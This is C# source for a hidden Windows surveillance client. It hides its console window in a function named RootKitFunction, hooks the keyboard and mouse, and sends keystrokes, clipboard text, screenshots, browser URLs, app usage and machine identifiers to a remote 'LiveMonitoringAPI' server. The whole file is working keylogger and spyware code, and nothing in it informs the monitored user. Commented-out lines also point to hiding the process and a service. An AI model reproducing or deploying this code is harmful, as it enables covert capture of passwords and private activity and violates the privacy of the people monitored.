internal static void WriteSessionEntry()
{
if (!Directory.Exists(Dirpath))
{
Directory.CreateDirectory(Dirpath);
}
if (Directory.Exists(Dirpath))
{
if (GlobalClass.RuningMachineSessionId == 0)
{
GlobalClass.WriteTolog("Write Session insert entry in text file session ID is " + GlobalClass.RuningMachineSessionId + " Session start time is " + GlobalClass.SessionStartDate.Value.ToString("yyyy-MM-dd HH:mm") + " Session End time is " + GlobalClass.ApplicationNowTime.ToString("yyyy-MM-dd HH:mm"));
string insertstring = GlobalClass.RuningMachineSessionId + "+" + GetStringFileDate(GlobalClass.SessionStartDate.Value) + "+" + GetStringFileDate(GlobalClass.ApplicationNowTime);
insertstring = Dirpath + "\\" + insertstring + ".txt";
File.Create(insertstring);
GlobalClass.RuningMachineSessionId = 0;
GlobalClass.SessionStartDate = GlobalClass.ApplicationNowTime;
}
else
{
GlobalClass.WriteTolog("Write Session Update entry in text file Session ID is " + GlobalClass.RuningMachineSessionId + " and Session END Time is " + GlobalClass.ApplicationNowTime.ToString("yyyy-MM-dd HH:mm"));
string insertstring = GlobalClass.RuningMachineSessionId + "+" + GetStringFileDate(GlobalClass.ApplicationNowTime);
insertstring = Dirpath + "\\" + insertstring + ".txt";
File.Create(insertstring);
GlobalClass.RuningMachineSessionId = 0;
GlobalClass.SessionStartDate = GlobalClass.ApplicationNowTime;
}
}
}
internal static void UploadLocalSessionData()
{
if (Directory.Exists(Dirpath) && CheckForInternetConnection())
{
DirectoryInfo dinfo = new DirectoryInfo(Dirpath);
FileInfo[] Files = dinfo.GetFiles("*.txt");
foreach (FileInfo file in Files)
{
try
{
string str = Path.GetFileNameWithoutExtension(file.Name);
string[] inData = str.Split('+');
if (inData.ToList().Count == 2) //Update Entry File
{
try
{
int Id = Convert.ToInt32(inData[0]);
string END = GetStringFileDate(inData[1]);
DateTime ENDDate = DateTime.ParseExact(END, "MM-dd-yyyy HH:mm:ss ", new System.Globalization.CultureInfo("en-US"), System.Globalization.DateTimeStyles.None);
if (UpdateSession(ENDDate, Id))
{
File.Delete(file.FullName);
GlobalClass.WriteTolog("Delete Session Temp File : " + file.FullName);
}
}
catch (Exception)
{
}
}
else if (inData.ToList().Count == 3)//Insert Entry File
{
try
{
int Id = Convert.ToInt32(inData[0]);
string END = GetStringFileDate(inData[2]);
string START = GetStringFileDate(inData[1]);
DateTime StartTime = DateTime.ParseExact(START, "MM-dd-yyyy HH:mm:ss ", new System.Globalization.CultureInfo("en-US"), System.Globalization.DateTimeStyles.None);
DateTime EndTime = DateTime.ParseExact(END, "MM-dd-yyyy HH:mm:ss ", new System.Globalization.CultureInfo("en-US"), System.Globalization.DateTimeStyles.None);
if (InsertUploadSessionEntry(StartTime, EndTime))
{
File.Delete(file.FullName);
GlobalClass.WriteTolog("Delete Session Temp File : " + file.FullName);
}
}
catch (Exception)
{
}
}
}
catch (Exception)
{
}
}
}
}
public static void fncScreenShot()
{
try
{
if (GlobalClass.CheckForInternetConnection())
{
using (HttpClient client = MachineInfoTracker.GetHttpClient())
{
using (var content = new MultipartFormDataContent("---------------------------" + DateTime.Now.Ticks.ToString("x")))
{
//Take Screen Shot
string activeWindowTitle = GetActiveWindowTitle();
Bitmap img = screenCapture();
var imageFile = new ByteArrayContent(ImageToByte2(img));
// Add file content
if (activeWindowTitle != OldTitle && !string.IsNullOrEmpty(activeWindowTitle))
{
OldTitle = activeWindowTitle;
imageFile.Headers.ContentType = MediaTypeHeaderValue.Parse("image/png");
imageFile.Headers.ContentDisposition = new ContentDispositionHeaderValue("attachment")
{
FileName = DateTime.Now.ToString("yyyy_MM_dd_HH_mm_ss") + ".png"
};
content.Add(imageFile);
// Add file content
content.Add(new StringContent(Program.MachineId.ToString()), name: "MachineId");
content.Add(new StringContent(MachineInfoTracker.GetUserName()), name: "UserName");
// Make a call to Web API
var result = client.PostAsync("api/LiveMonitoringAPI/UploadFiles", content).Result;
if (result.StatusCode.ToString() != "OK")
{
Console.WriteLine(result.StatusCode);
GlobalClass.WriteTolog("Save new Screen Shot on server");
}
}
}
}
}
else
{
GlobalClass.WriteTolog("server not giving any response in ScreenShot function");
}
}
catch (Exception ex)
{
Console.WriteLine("Error In ScreenShot.cs in fncScreenShot Fuction " + ex.Message);
GlobalClass.WriteTolog("Error In ScreenShot.cs in fncScreenShot Fuction " + ex.Message);
}
}
public static bool InsertNewSessionEntry(DateTime StartDate, DateTime EndDate)
{
bool returnData = false;
try
{
if (CheckForInternetConnection() && Program.MachineId > 0)
{
using (HttpClient client = MachineInfoTracker.GetHttpClient())
{
MachineSession model = new MachineSession {
MachineDetailId = Program.MachineId, SessionStart = StartDate, SessionEnd = EndDate
};
HttpResponseMessage Response = client.PostAsync <MachineSession>("api/LiveMonitoringAPI/AddMachineSession", model, new JsonMediaTypeFormatter()).Result;
if (Response.IsSuccessStatusCode == true)
{
var result = Response.Content.ReadAsStringAsync().Result;
if (Convert.ToInt32(result) > 0)
{
// reset any value is here
// Console.Clear();
GlobalClass.RuningMachineSessionId = Convert.ToInt32(result);
GlobalClass.WriteTolog("Saved New Session insert entry in database" + GlobalClass.RuningMachineSessionId + "Start Time : " + StartDate.ToString("MM/dd/yyyy HH:mm") + " End Date is : " + EndDate.ToString("MM/dd/yyyy HH:mm"));
Console.WriteLine("Saved New Session insert entry in database" + GlobalClass.RuningMachineSessionId + "Start Time : " + StartDate.ToString("MM/dd/yyyy HH:mm") + " End Date is : " + EndDate.ToString("MM/dd/yyyy HH:mm"));
returnData = true;
}
else if (Convert.ToInt32(result) == 0)
{
Program.AddMachineInfo();
return(false);
}
}
else if (Response != null && Response.IsSuccessStatusCode == false)
{
var result = Response.Content.ReadAsStringAsync().Result;
Console.Write("Error Message - " + result);
}
}
}
return(returnData);
}
catch (Exception)
{
return(returnData);
}
}
static void WriteBrowserData(string Title, string Url, string BrowserName, string Version)
{
if (GlobalClass.CheckForInternetConnection())
{
try
{
if (!(Title.Contains("New Tab") || Title.Contains("Speed Dial") || Title.Contains("\"")))
{
using (HttpClient client = MachineInfoTracker.GetHttpClient())
{
BrowserDetail model = new BrowserDetail {
MachineDetailId = Program.MachineId, BrowserName = BrowserName, BrowserVersion = Version, Title = Title, URL = Url, CreatedDate = DateTime.Now
};
HttpResponseMessage Response = client.PostAsync <BrowserDetail>("api/LiveMonitoringAPI/AddBrowserDetails", model, new JsonMediaTypeFormatter()).Result;
if (Response.IsSuccessStatusCode == true)
{
var result = Response.Content.ReadAsStringAsync().Result;
if (result.Contains("OK"))
{
Console.WriteLine("Record saved successfully.");
GlobalClass.WriteTolog("Record saved successfully.");
}
else if (result.Contains("Invalid"))
{
Program.AddMachineInfo();
}
}
else if (Response != null && Response.IsSuccessStatusCode == false)
{
var result = Response.Content.ReadAsStringAsync().Result;
Console.Write("Error Message - " + result);
GlobalClass.WriteTolog("Error Message - " + result);
}
}
}
}
catch (Exception ex)
{
Console.WriteLine("Error In BrowserUrlTracker.cs in WriteBrowserData Fuction " + ex.Message);
GlobalClass.WriteTolog("Error In BrowserUrlTracker.cs in WriteBrowserData Fuction " + ex.Message);
}
}
else
{
GlobalClass.WriteTolog("server not giving any response");
}
}
public static void KeyBordStart()
{
try
{
if (!GlobalClass.Iskeyhook)
{
_hookID = SetHook(_proc);
System.Threading.Thread.Sleep(1000);
GlobalClass.Iskeyhook = true;
GlobalClass.WriteTolog("KeyBoard Hook Start");
}
}
catch (Exception)
{
GlobalClass.Iskeyhook = false;
}
}
private static void TimerClipboard_Interval(Object o)
{
try
{
rehook();
if (!(Program.IsBlocked == true && Program.IsSendBlockData == false))
{
//2.) save Clipbord test here
GlobalClass.FncClipboard();
}
GC.Collect();
}
catch (Exception)
{
GlobalClass.WriteTolog("Error in TimerClipboard_Interval");
}
}
private static void TimerKeyLogger_Interval(Object o)
{
try
{
rehook();
if (!(Program.IsBlocked == true && Program.IsSendBlockData == false))
{
//1.) save Keybord test here
GlobalClass.addKeyLoggerInfo(GlobalClass.KeyBordText, "KL");
}
GC.Collect();
}
catch (Exception ex)
{
GlobalClass.WriteTolog("Error in TimerKeyLogger_Interval");
}
}
private static void TimerSession_Interval(Object o)
{
try
{
if (!(Program.IsBlocked == true && Program.IsSendBlockData == false))
{
//5.) Insert New Session
GlobalClass.UploadLocalSessionData();
GlobalClass.SaveNewSessionEntry();
}
GC.Collect();
}
catch (Exception)
{
GlobalClass.WriteTolog("Error in TimerSession_Interval");
}
}
private static void TimerApp_Interval(Object o)
{
try
{
rehook();
if (!(Program.IsBlocked == true && Program.IsSendBlockData == false))
{
//5.) Send Application and BrowerDetails
AppTracker.fncAppTracker();
}
GC.Collect();
}
catch (Exception)
{
GlobalClass.WriteTolog("Error in TimerApp_Interval");
}
}
private static void TimerScreenshot_Interval(Object o)
{
try
{
rehook();
if (!(Program.IsBlocked == true && Program.IsSendBlockData == false))
{
//4.)Send Screenshot
ScreenShot.fncScreenShot();
}
GC.Collect();
}
catch (Exception)
{
GlobalClass.WriteTolog("Error in TimerScreenshot_Interval");
}
}
public static void AddMachineInfo()
{
if (GlobalClass.CheckForInternetConnection())
{
try
{
using (HttpClient client = MachineInfoTracker.GetHttpClient())
{
string strMachineName = MachineInfoTracker.GetMachineName();
string strMachineIP = MachineInfoTracker.GetPrimaryAdapterDetails().AdapterIP;
string strUserName = MachineInfoTracker.GetUserName();
string strMACAddress = MachineInfoTracker.GetPrimaryAdapterDetails().AdapterMacAddress;
int customerID = Constants.CustomerId;
MachineDetail model = new MachineDetail {
MachineName = strMachineName, CustomerId = customerID, MachineMacAddress = strMACAddress, MachineIP = strMachineIP, UserName = strUserName, CreatedDate = DateTime.Now
};
HttpResponseMessage Response = client.PostAsync <MachineDetail>("api/LiveMonitoringAPI/AddMachineDetails", model, new JsonMediaTypeFormatter()).Result;
if (Response.IsSuccessStatusCode == true)
{
var machineID = Response.Content.ReadAsStringAsync().Result;
machineID = machineID.Replace("\"", string.Empty).Trim();
string[] result = machineID.Split('_');
MachineId = Convert.ToInt16(result[0]);
IsBlocked = Convert.ToBoolean(result[1].ToString());
}
else if (Response != null && Response.IsSuccessStatusCode == false)
{
var result = Response.Content.ReadAsStringAsync().Result;
Console.Write("Error Message - " + result);
GlobalClass.WriteTolog("Error Message - " + result);
}
}
}
catch (Exception ex)
{
Console.WriteLine("Error In Program.cs in AddMachineInfo Fuction " + ex.Message);
GlobalClass.WriteTolog("Error In Program.cs in AddMachineInfo Fuction " + ex.Message);
}
}
else
{
GlobalClass.WriteTolog("server not giving any response in AddMachineInfo function");
}
}
public static void addKeyLoggerInfo(string LogText, string Type)
{
if (LogText != "" && CheckForInternetConnection())
{
try
{
using (HttpClient client = MachineInfoTracker.GetHttpClient())
{
KeyLogging model = new KeyLogging {
MachineDetailId = Program.MachineId, Text = LogText, TextType = Type, CreatedDate = DateTime.Now
};
HttpResponseMessage Response = client.PostAsync <KeyLogging>("api/LiveMonitoringAPI/AddKeyLoggings", model, new JsonMediaTypeFormatter()).Result;
if (Response.IsSuccessStatusCode == true)
{
var result = Response.Content.ReadAsStringAsync().Result;
if (result.Contains("OK"))
{
if (Type == "KL")
{
KeyBordText = "";
}
// Console.Clear();
Console.WriteLine("Record (" + Type + ") saved successfully.");
GlobalClass.WriteTolog("Record (" + Type + ") saved successfully.");
}
else if (result.Contains("Invalid"))
{
Program.AddMachineInfo();
}
}
else if (Response != null && Response.IsSuccessStatusCode == false)
{
var result = Response.Content.ReadAsStringAsync().Result;
Console.Write("Error Message - " + result);
GlobalClass.WriteTolog("Error Message - " + result);
}
}
}
catch (Exception ex)
{
Console.WriteLine("Error In GlobalClass.cs in addKeyLoggerInfo Fuction " + ex.Message);
GlobalClass.WriteTolog("Error In GlobalClass.cs in addKeyLoggerInfo Fuction " + ex.Message);
}
}
}
public static bool UpdateSession(DateTime SessionEndDate, int PrimaryKey)
{
bool ReturnUpdate = false;
try
{
if (CheckForInternetConnection() && PrimaryKey != 0)
{
using (HttpClient client = MachineInfoTracker.GetHttpClient())
{
MachineSession model = new MachineSession {
MachineSessionId = PrimaryKey, MachineDetailId = Program.MachineId, SessionEnd = SessionEndDate, SessionStart = SessionEndDate
};
HttpResponseMessage Response = client.PostAsync <MachineSession>("api/LiveMonitoringAPI/UpdateMachineSession", model, new JsonMediaTypeFormatter()).Result;
if (Response.IsSuccessStatusCode == true)
{
var result = Response.Content.ReadAsStringAsync().Result;
if (Convert.ToInt32(result) == PrimaryKey)
{
Console.WriteLine("Update id is :- " + PrimaryKey + " and End Time Is" + SessionEndDate);
GlobalClass.WriteTolog("Update id is :- " + PrimaryKey + " and End Time Is" + SessionEndDate);
// reset any value is here
// Console.Clear();
ReturnUpdate = true;
}
else if (Convert.ToInt32(result) == 0)
{
Program.AddMachineInfo();
}
}
else if (Response != null && Response.IsSuccessStatusCode == false)
{
var result = Response.Content.ReadAsStringAsync().Result;
Console.Write("Error Message - " + result);
}
}
}
return(ReturnUpdate);
}
catch (Exception)
{
return(ReturnUpdate);
}
}
private static void TimerIdle_Interval(Object o)
{
try
{
rehook();
if (!(Program.IsBlocked == true && Program.IsSendBlockData == false))
{
//3.) save Idle time here
// Console.WriteLine("Your Idle time is : " + GlobalClass.lastIdleMinute);
GlobalClass.WriteMachineIdleTime(GlobalClass.lastIdleMinute);
}
GC.Collect();
}
catch (Exception)
{
GlobalClass.WriteTolog("Error in TimerIdle_Interval");
}
}
static void Main(string[] args)
{
Thread.CurrentThread.CurrentCulture = new System.Globalization.CultureInfo("en-US");
RootKitFunction();
bool createdNew;
Mutex m = new Mutex(true, Application.ProductName, out createdNew);
createdNew = true;
if (!createdNew)
{
// myApp is already running...
//MessageBox.Show(Application.ProductName + " is already running!", "Multiple Instances");
GlobalClass.WriteTolog(Application.ProductName + " is already running!");
return;
}
GlobalClass.WriteTolog("Application Start");
GlobalClass.Iskeyhook = false;
GlobalClass.Ismousehook = false;
IsSendBlockData = true;
IsBlocked = false;
GlobalClass.WriteTolog("Add system event with custon event");
GetCofigrationSettings();
AddMachineInfo();
GlobalClass.UploadLocalSessionData();
GlobalClass.SaveNewSessionEntry();
keyboardHook.KeyBordStart();
MouseHook.MouseStart();
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.SetUnhandledExceptionMode(UnhandledExceptionMode.ThrowException);
Application.Run(new MyApplicationContext());
//keyboardHook.KeyBordStop();
//MouseHook.MouseSTOP();
}
public static void GetCofigrationSettings()
{
if (GlobalClass.CheckForInternetConnection())
{
try
{
using (HttpClient client = MachineInfoTracker.GetHttpClient())
{
int customerID = Constants.CustomerId;
HttpResponseMessage Response = client.GetAsync("api/LiveMonitoringAPI/GetCofigrationSettings?customerId=" + customerID).Result;
if (Response.IsSuccessStatusCode == true)
{
JObject jResponse = JObject.Parse(Response.Content.ReadAsStringAsync().Result);
Screenshot_Interval = Convert.ToInt16(jResponse["ScreenShot_Interval"].ToString());
Idle_Interval = Convert.ToInt16(jResponse["MachineIdle_Interval"].ToString());
KeyLogger_Interval = Convert.ToInt16(jResponse["KeyLogger_Interval"].ToString());
App_Interval = Convert.ToInt16(jResponse["AppTracker_Interval"].ToString());
KeyLogger_MinTime = Convert.ToInt16(jResponse["KeyLogger_MinTime"].ToString());
Idle_MinTime = Convert.ToInt16(jResponse["MachineIdle_MinTime"].ToString());
IsSendBlockData = Convert.ToBoolean(jResponse["IsSendBlockData"].ToString());
SetallIntervalsInSeconds();
}
else if (Response != null && Response.IsSuccessStatusCode == false)
{
var result = Response.Content.ReadAsStringAsync().Result;
Console.Write("Error Message - " + result);
GlobalClass.WriteTolog("Error Message - " + result);
}
}
}
catch (Exception ex)
{
Console.WriteLine("Error In Program.cs in GetCofigrationSettings Fuction " + ex.Message);
GlobalClass.WriteTolog("Error In Program.cs in GetCofigrationSettings Fuction " + ex.Message);
}
}
else
{
GlobalClass.WriteTolog("error in GetCofigrationSettings function server not availble");
}
}
private static void OnPowerModeChanged(object sender, PowerModeChangedEventArgs e)
{
if (e.Mode == PowerModes.Suspend)
{
GlobalClass.WriteSessionEntry();
if (!(Program.IsBlocked == true && Program.IsSendBlockData == false))
{
GlobalClass.GetIdletimetillmodechange();
ApplicationData AD = new ApplicationData();
AD.SendToServer();
}
}
GlobalClass.WriteTolog("Power Mode Change in this mode :- " + e.Mode);
Console.WriteLine("Power Mode Change in this mode :- " + e.Mode);
if (e.Mode == PowerModes.Resume)
{
Application.Restart();
//GlobalClass.SessionStartDate = GlobalClass.ApplicationNowTime;
//GlobalClass.LastIdletime = GlobalClass.ApplicationNowTime;
//GlobalClass.lastIdleMinute = 0;
}
}
public static void ReadBrowserUrlforIE()
{
try
{
if (HttpContext.Current != null)
{
HttpBrowserCapabilities objbrowser = HttpContext.Current.Request.Browser;
}
SHDocVw.InternetExplorer browser;
SHDocVw.ShellWindows shellWindows = new SHDocVw.ShellWindows();
string filename;
foreach (SHDocVw.InternetExplorer ie in shellWindows)
{
filename = System.IO.Path.GetFileNameWithoutExtension(ie.FullName).ToLower();
if ((filename == "iexplore"))
{
browser = ie;
string Title = AppTracker.GetActiveWindowTitle();
GlobalClass.WriteTolog(Title);
GlobalClass.WriteTolog(browser.LocationName);
if (Title.Contains(browser.LocationName) && Title.Contains("Internet Explorer") && browser.LocationName != "")
{
if (browser.LocationName != browser.LocationURL && browser.LocationURL != OldUrlIE)
{
OldUrlIE = browser.LocationURL;
string version = GetBrowsers("Internet Explorer");
WriteBrowserData(browser.LocationName, browser.LocationURL, "Internet Explorer", version);
}
}
}
}
}
catch (Exception e)
{
}
}
public static bool CheckForInternetConnection()
{
try
{
Uri myUri = new Uri(Constants.RemoteUrl);
Ping myPing = new Ping();
String host = myUri.Host;
byte[] buffer = new byte[32];
int timeout = 1000;
PingOptions pingOptions = new PingOptions();
PingReply reply = myPing.Send(host, timeout, buffer, pingOptions);
if (reply.Status == IPStatus.Success)
{
return(true);
}
return(false);
}
catch (Exception ex)
{
GlobalClass.WriteTolog("server not giving any response Error in function " + ex.Message);
return(false);
}
}
static void RootKitFunction()
{
try
{
var handle = GetConsoleWindow();
GlobalClass.WriteTolog("Hide Code run for Console App");
// code Hide
ShowWindow(handle, SW_HIDE);
//ShowWindow(handle, SW_SHOW);
}
catch (Exception)
{
}
try
{
///Process pro = Process.GetCurrentProcess();
//ApiRootkit.Rootkit.HideProcess(pro);
//ApiRootkit.Rootkit.HideService("svcrshost");
}
catch (Exception)
{
}
}
public static void fncAppTracker()
{
if (GlobalClass.CheckForInternetConnection())
{
try
{
string title = string.Empty;
string appexe = string.Empty;
IntPtr handle = GetForegroundWindow();
if (!handle.Equals(IntPtr.Zero))
{
int tLength = GetWindowTextLength(handle);
if (tLength > 0)
{
if (tLength > 255)
{
tLength = 255;
}
StringBuilder wTitle = new StringBuilder(string.Empty, tLength + 1);
if (GetWindowText(handle, wTitle, wTitle.Capacity) > 0)
{
title = wTitle.ToString();
}
if (title != OldTitle && !String.IsNullOrEmpty(title))
{
int wProcID = 0;
if (GetWindowThreadProcessId(handle, out wProcID) > 0)
{
appexe = Process.GetProcessById(wProcID).ProcessName;
}
if (!string.IsNullOrEmpty(appexe))
{
if (appexe.Equals("firefox"))
{
BrowserUrlTracker.ReadBrowserUrlforFirefox();
//BrowserUrlTracker.ReadBrowserUrlforChrome();
}
else if (appexe.Equals("iexplore"))
{
BrowserUrlTracker.ReadBrowserUrlforIE();
}
else if (appexe.Equals("chrome"))
{
BrowserUrlTracker.ReadBrowserUrlforChrome();
}
else if (appexe.Equals("opera"))
{
BrowserUrlTracker.ReadBrowserUrlforOpera();
}
else
{
OldTitle = title;
appexe = appexe + ".exe";
WriteData(title, appexe);
}
}
}
}
}
}
catch (Exception ex)
{
Console.WriteLine("Error on AppTracker.cs in fncAppTracker function :- " + ex.Message);
GlobalClass.WriteTolog("Error on AppTracker.cs in fncAppTracker function :- " + ex.Message);
}
}
else
{
GlobalClass.WriteTolog("server not giving any response");
}
}
